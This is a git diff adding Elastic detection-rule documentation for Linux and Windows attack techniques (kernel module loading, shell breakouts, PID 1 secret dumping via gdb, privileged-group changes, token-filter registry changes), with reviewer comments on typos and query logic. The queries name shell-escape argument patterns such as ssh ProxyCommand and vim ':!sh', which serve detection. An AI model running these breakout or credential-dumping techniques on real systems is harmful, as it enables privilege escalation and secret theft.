b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc new file mode 100644 index 0000000000..110c2771d6 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc 
@@ -0,0 +1,90 @@ +[[prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected]] +=== Kernel Load or Unload via Kexec Detected + +This detection rule identifies the usage of kexec, helping to uncover unauthorized kernel replacements and potential compromise of the system's integrity. Kexec is a Linux feature that enables the loading and execution of a different kernel without going through the typical boot process. Malicious actors can abuse kexec to bypass security measures, escalate privileges, establish persistence or hide their activities by loading a malicious kernel, enabling them to tamper with the system's trusted state, allowing e.g. a VM Escape. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.crowdstrike.com/blog/venom-vulnerability-details/ +* https://www.makeuseof.com/what-is-venom-vulnerability/ +* https://madaidans-insecurities.github.io/guides/linux-hardening.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and process.name == "kexec" and +process.args in ("--exec", "-e", "--load", "-l", "--unload", "-u") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Escape to Host +** ID: T1611 +** Reference URL: 
https://attack.mitre.org/techniques/T1611/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify System Image +** ID: T1601 +** Reference URL: https://attack.mitre.org/techniques/T1601/ +* Sub-technique: +** Name: Patch System Image +** ID: T1601.001 +** Reference URL: https://attack.mitre.org/techniques/T1601/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc new file mode 100644 index 0000000000..7c0cf5aa99 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc 
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-kernel-module-load-via-insmod]] +=== Kernel Module Load via insmod + +Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Threat: Rootkit +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name == "insmod" and process.args : "*.ko" +and not process.parent.name in ("cisco-amp-helper", "ksplice-apply") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ 
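Review bot: in the Kernel Module Load via insmod hunk, the description misspells "suspcious" (should be "suspicious"). The rule also keys on `event.type == "start"` while the neighbouring kexec and Kernel Module Removal rules key on `event.action == "exec"`; if the difference is intentional (this rule lists the `endgame-*` index, the kexec rule does not), a one-line note in the doc would stop a later editor from "harmonising" it.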
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc new file mode 100644 index 0000000000..7dd00e8244 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-kernel-module-removal.asciidoc 
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-kernel-module-removal]] +=== Kernel Module Removal + +Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://man7.org/linux/man-pages/man8/modprobe.8.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and process.name == "rmmod" or +(process.name == "modprobe" and process.args in ("--remove", "-r")) and +process.parent.name in ("sudo", "bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: 
https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc new file mode 100644 index 0000000000..1f36bcd91c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc 
@@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-lateral-movement-via-startup-folder]] +=== Lateral Movement via Startup Folder + +Identifies suspicious file creations in the startup folder of a remote system. An adversary could abuse this to move laterally by dropping a malicious script or executable that will be executed after a reboot or user logon. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mdsec.co.uk/2017/06/rdpinception/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type in ("creation", "change") and + + /* via RDP TSClient mounted share or SMB */ + (process.name : "mstsc.exe" or process.pid == 4) and + + file.path : ("?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: 
https://attack.mitre.org/techniques/T1021/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc new file mode 100644 index 0000000000..5273af6f42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc 
@@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb]] +=== Linux init (PID 1) Secret Dump via GDB + +This rule monitors for the potential memory dump of the init process (PID 1) through gdb. Attackers may leverage memory dumping techniques to attempt secret extraction from privileged processes. Tools that display this behavior include "truffleproc" and "bash-memory-dump". This behavior should not happen by default, and should be investigated thoroughly. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/controlplaneio/truffleproc +* https://github.com/hajzer/bash-memory-dump + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "gdb" and process.args in ("--pid", "-p") and process.args == "1" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Proc Filesystem +** ID: T1003.007 +** Reference URL: https://attack.mitre.org/techniques/T1003/007/ 
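Review bot: in the Linux init (PID 1) Secret Dump via GDB hunk, `process.args in ("--pid", "-p") and process.args == "1"` tests the two tokens independently rather than as an adjacent pair, so any gdb invocation that attaches to some other PID and also carries a separate `1` argument anywhere (a file name, for instance) will match, while the single-token spelling of the same option, `--pid=1`, is not covered. The doc should state that the match is token-based, and adding `"--pid=1"` to the argument list would make both spellings behave the same.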
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc new file mode 100644 index 0000000000..b03ea93272 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc 
@@ -0,0 +1,193 @@ +[[prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s]] +=== Linux Restricted Shell Breakout via Linux Binary(s) + +Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://gtfobins.github.io/gtfobins/apt/ +* https://gtfobins.github.io/gtfobins/apt-get/ +* https://gtfobins.github.io/gtfobins/nawk/ +* https://gtfobins.github.io/gtfobins/mawk/ +* https://gtfobins.github.io/gtfobins/awk/ +* https://gtfobins.github.io/gtfobins/gawk/ +* https://gtfobins.github.io/gtfobins/busybox/ +* https://gtfobins.github.io/gtfobins/c89/ +* https://gtfobins.github.io/gtfobins/c99/ +* https://gtfobins.github.io/gtfobins/cpulimit/ +* https://gtfobins.github.io/gtfobins/crash/ +* https://gtfobins.github.io/gtfobins/env/ +* https://gtfobins.github.io/gtfobins/expect/ +* https://gtfobins.github.io/gtfobins/find/ +* https://gtfobins.github.io/gtfobins/flock/ +* https://gtfobins.github.io/gtfobins/gcc/ +* https://gtfobins.github.io/gtfobins/mysql/ +* https://gtfobins.github.io/gtfobins/nice/ +* https://gtfobins.github.io/gtfobins/ssh/ +* https://gtfobins.github.io/gtfobins/vi/ +* https://gtfobins.github.io/gtfobins/vim/ +* https://gtfobins.github.io/gtfobins/capsh/ +* https://gtfobins.github.io/gtfobins/byebug/ +* https://gtfobins.github.io/gtfobins/git/ +* https://gtfobins.github.io/gtfobins/ftp/ + +*Tags*: + +* Domain: 
Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 110 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Shell Evasion via Linux Utilities +Detection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or +environments by spawning an interactive system shell. +Here are some possible avenues of investigation: +- Examine the entry point to the host and user in action via the Analyse View. + - Identify the session entry leader and session user +- Examine the contents of session leading to the abuse via the Session View. + - Examine the command execution pattern in the session, which may lead to suspricous activities +- Examine the execution of commands in the spawned shell. + - Identify imment threat to the system from the executed commands + - Take necessary incident response actions to contain any malicious behviour caused via this execution. + +### Related rules + +- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences. +- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment + +### Response and remediation + +Initiate the incident response process based on the outcome of the triage. + +- If the triage releaved suspicious netwrok activity from the malicious spawned shell, + - Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware execution via the maliciously spawned shell, + - Search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. 
+ - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- If the triage revelaed defence evasion for imparing defenses + - Isolate the involved host to prevent further post-compromise behavior. + - Identified the disabled security guard components on the host and take necessary steps in renebaling the same. + - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same. +- If the triage revelaed addition of persistence mechanism exploit like auto start scripts + - Isolate further login to the systems that can initae auto start scripts. + - Identify the auto start scripts and disable and remove the same from the systems +- If the triage revealed data crawling or data export via remote copy + - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling + - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials. + - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +( + /* launching shell from capsh */ + (process.name == "capsh" and process.args == "--") or + + /* launching shells from unusual parents or parent+arg combos */ + (process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( + (process.parent.name : "*awk" and process.parent.args : "BEGIN {system(*)}") or + (process.parent.name == "git" and process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or + process.args : ("*PAGER*", "!*sh", "exec *sh") and not process.name == "ssh" ) or + (process.parent.name : ("byebug", "ftp", "strace", "zip", "tar") and + ( + process.parent.args : "BEGIN {system(*)}" or + (process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh")) or + ( + (process.parent.args : "exec=*sh" or (process.parent.args : "-I" and process.parent.args : "*sh")) or + (process.args : "exec=*sh" or (process.args : "-I" and process.args : "*sh")) + ) + ) + ) or + + /* shells specified in parent args */ + /* nice rule is broken in 8.2 */ + (process.parent.args : "*sh" and + ( + (process.parent.name == "nice") or + (process.parent.name == "cpulimit" and process.parent.args == "-f") or + (process.parent.name == "find" and process.parent.args == "." 
and process.parent.args == "-exec" and + process.parent.args == ";" and process.parent.args : "/bin/*sh") or + (process.parent.name == "flock" and process.parent.args == "-u" and process.parent.args == "/") + ) + ) + )) or + + /* shells specified in args */ + (process.args : "*sh" and ( + (process.parent.name == "crash" and process.parent.args == "-h") or + (process.name == "sensible-pager" and process.parent.name in ("apt", "apt-get") and process.parent.args == "changelog") + /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */ + + )) or + (process.name == "busybox" and event.action == "exec" and process.args_count == 2 and process.args : "*sh" and not + process.executable : "/var/lib/docker/overlay2/*/merged/bin/busybox" and not (process.parent.args == "init" and + process.parent.args == "runc") and not process.parent.args in ("ls-remote", "push", "fetch") and not process.parent.name == "mkinitramfs") or + (process.name == "env" and process.args_count == 2 and process.args : "*sh") or + (process.parent.name in ("vi", "vim") and process.parent.args == "-c" and process.parent.args : ":!*sh") or + (process.parent.name in ("c89", "c99", "gcc") and process.parent.args : "*sh,-s" and process.parent.args == "-wrapper") or + (process.parent.name == "expect" and process.parent.args == "-c" and process.parent.args : "spawn *sh;interact") or + (process.parent.name == "mysql" and process.parent.args == "-e" and process.parent.args : "\\!*sh") or + (process.parent.name == "ssh" and process.parent.args == "-o" and process.parent.args : "ProxyCommand=;*sh 0<&2 1>&2") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** 
Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc new file mode 100644 index 0000000000..429c0c8469 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc 
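Review bot: The investigation guide in the Linux Restricted Shell Breakout hunk is full of misspellings that will ship verbatim to users ("suspricous", "imment", "behviour", "MITTRE", "adviced", "privilige", "releaved", "netwrok", "revelaed", "imparing", "renebaling", "disbaled", "initae", "Intiate", "crednetials", "Investiagte", plus "breakout" used as a verb); please spell-check the markdown block before merge. Two points in the query: the stale comment `/* nice rule is broken in 8.2 */` tells an 8.10.5 reader nothing and should go, and in the `git` branch `and` binds tighter than `or`, so `process.args : ("*PAGER*", "!*sh", "exec *sh") and not process.name == "ssh"` is evaluated on its own rather than together with `process.parent.name == "git"` (and `process.name` can never be `ssh` there, since the enclosing clause restricts it to the shell list), so either the parentheses or the intent needs correcting. Minor: this page carries an investigation guide but its Tags lack `Resources: Investigation Guide`, which the Linux User Added to Privileged Group page in this same patch does include.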
@@ -0,0 +1,128 @@ +[[prebuilt-rule-8-10-5-linux-user-added-to-privileged-group]] +=== Linux User Added to Privileged Group + +Identifies attempts to add a user to a privileged group. Attackers may add users to a privileged group in order to establish persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Linux User User Added to Privileged Group + +The `usermod`, `adduser`, and `gpasswd` commands can be used to assign user accounts to new groups in Linux-based operating systems. + +Attackers may add users to a privileged group in order to escalate privileges or establish persistence on a system or domain. + +This rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign user accounts to a privileged group. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps + +- Investigate whether the user was succesfully added to the privileged group. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific User","query":"SELECT * FROM users WHERE username = {{user.name}}"}} +- Investigate whether the user is currently logged in and active. + - !{osquery{"label":"Osquery - Investigate the Account Authentication Status","query":"SELECT * FROM logged_in_users WHERE user = {{user.name}}"}} +- Retrieve information about the privileged group to which the user was added. + - !{osquery{"label":"Osquery - Retrieve Information for a Specific Group","query":"SELECT * FROM groups WHERE groupname = {{group.name}}"}} +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- Adding accounts to a group is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. 
+ - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed. +- Delete the account that seems to be involved in malicious activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +process.parent.name == "sudo" and +process.args in ("root", "admin", "wheel", "staff", "sudo", + "disk", "video", "shadow", "lxc", "lxd") and +( + process.name in ("usermod", "adduser") or + process.name == "gpasswd" and + process.args in ("-a", "--add", "-M", "--members") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create Account +** ID: T1136 +** Reference URL: https://attack.mitre.org/techniques/T1136/ +* Sub-technique: +** Name: Local Account +** ID: T1136.001 +** Reference URL: https://attack.mitre.org/techniques/T1136/001/ 
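Review bot: The guide heading `### Investigating Linux User User Added to Privileged Group` duplicates "User", and "succesfully" in the first investigation step is misspelled. On the query, `process.args in ("root", "admin", "wheel", ...)` matches only when the group name is a whole argument and `process.parent.name == "sudo"` requires the change to go through sudo, so a group passed inside a comma-separated list or a command run from an existing root shell is outside the rule's coverage; if that scope is intentional it belongs in the description or the False positive analysis, otherwise consider a wildcard match on the group argument. The osquery labelled "Retrieve Running Processes by User" does not reference `{{user.name}}`, so it returns every process on the host rather than the account under investigation.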
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc new file mode 100644 index 0000000000..efa40734ae --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc 
@@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled]] +=== Local Account TokenFilter Policy Disabled + +Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439 +* https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167 +* https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\*\\LocalAccountTokenFilterPolicy", + "\\REGISTRY\\MACHINE\\*\\LocalAccountTokenFilterPolicy") and + registry.data.strings : ("1", "0x00000001") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: 
T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc new file mode 100644 index 0000000000..02abb897aa --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc 
